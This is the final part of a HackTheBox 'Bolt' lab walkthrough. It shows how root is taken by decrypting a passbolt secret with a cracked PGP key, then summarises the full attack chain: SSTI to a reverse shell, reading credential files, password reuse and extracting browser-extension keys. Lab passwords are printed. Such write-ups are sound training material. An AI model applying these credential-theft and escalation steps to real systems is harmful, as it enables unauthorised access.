Result: {“password”:”Z(2rmxsNW(Z?3=p/9s”,”description”:””}

HackTheBox “Bolt” Walkthrough, figure 30

Why: We import eddie’s private key into our local GPG keyring, then decrypt the PGP message from the database. The decrypted content is a JSON object containing the password stored in passbolt — which turns out to be the root password.

Hacker mindset: Password managers store the most sensitive credentials. Compromising a user’s password manager is often the fastest path to full system compromise. Here, the root password was stored in passbolt for “convenience.”

Step 18: Become Root

Commands:
su -
Password: Z(2rmxsNW(Z?3=p/9s
cat /root/root.txt

HackTheBox “Bolt” Walkthrough, figure 31

Root flag captured.

FULL ATTACK CHAIN SUMMARY

  • Docker image download
     |
  • Extract SQLite DB → crack admin hash (deadbolt)
    Extract Flask source → find invite code (XNSS-HSJW-3NGU-8XTJ)
     |
  • Login to bolt.htb as admin
    Register on demo.bolt.htb with invite code
    Login to mail.bolt.htb with same creds
     |
  • SSTI via profile Name field → reverse shell → www-data
     |
  • Read /etc/passbolt/passbolt.php → DB password (rT2;jW7<eY8!dX8}pQ8%)
    su eddie with DB password → USER FLAG
     |
  • Read /var/mail/eddie → hint about passbolt extension
    Extract PGP private key from Chrome LevelDB
    Crack passphrase with john → merrychristmas
     |
  • Query passbolt DB for encrypted secret
    Decrypt with eddie’s PGP key → root password (Z(2rmxsNW(Z?3=p/9s)
    su root → ROOT FLAG

KEY LESSONS

  • Docker images leak historical data
    Why it matters: Old layers preserve deleted files. Always inspect every layer.
  • Hardcoded secrets in source code
    Why it matters: Invite codes, API keys, passwords — grep for them.
  • SSTI is RCE
    Why it matters: Any user input reaching render_template_string() is dangerous.
  • Password reuse
    Why it matters: The DB password worked for the system user. Always try passwords everywhere.
  • Browser extension storage is readable
    Why it matters: If you have FS access, you can read extension keys.
  • Password managers store the crown jewels
    Why it matters: Compromising passbolt gave us root.
  • Weak passphrases on strong keys
    Why it matters: A 2048-bit RSA key protected by merrychristmas is not strong.

Happy Hacking!